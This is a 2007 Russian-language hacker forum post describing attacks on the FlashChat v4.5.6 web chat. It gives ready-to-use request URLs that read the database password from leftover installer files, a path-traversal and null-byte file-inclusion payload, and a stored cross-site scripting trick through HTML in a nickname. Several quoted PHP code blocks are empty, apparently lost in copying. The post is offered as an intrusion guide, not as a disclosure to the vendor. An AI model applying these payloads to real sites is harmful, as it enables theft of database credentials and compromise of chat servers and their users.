![]() |
FlashChat some bugz
Здрасвуйте, сегодня я покажу несколько найденых уязвимостей в чате FlashChat v 4.5.6. Тестил на старой версии, т.к. не было возомжности потестить на новой.
Возможно баги существуют в новых версиях. Найденное мною ранее: пасивная xss в движке чата Итак приступим! Часто бывает что админы не удаляют установочные файлы . Если это так, то, возможно, мы увидим такой текст: Цитата:
Узнаём пароль на MySQL ====================== Перейдём ко второму шагу установки чата Код:
http://server.omg.ru/chat/install.php?step=2Цитата:
Пароль на MySQL выводиться в html-форме под звёздочками. Код:
<INPUT type="password" size="40" name="password" value="<?php echo $dbpass ?>" <?php if($useCMS) echo 'disabled';?>>Код:
<INPUT type="password" size="40" name="password" value="89f732r" >=================== Локальный инклудинГ =================== Всё те же файлы установки... Приведу кусок кода с файла install.php: PHP код:
Код:
http://server.omg.ru/chat/install.php?step=2'Код:
Warning: include(./install_files/step_2\'.php) [function.include]: failed to open stream: No such file or directory in \home\omg\htdocs\chat\install.php on line 18Код:
http://server.omg.ru/chat/install.php?step=2.php/../../index.php%00============ Активная xsS ============ Плохая проверка имён в файле info.php PHP код:
Если войти в чат с ником <h1>mda</h1>,то при обращении к файле info.php увидим наш текст :) /me Goudini - 2007 |
| Время: 20:11 |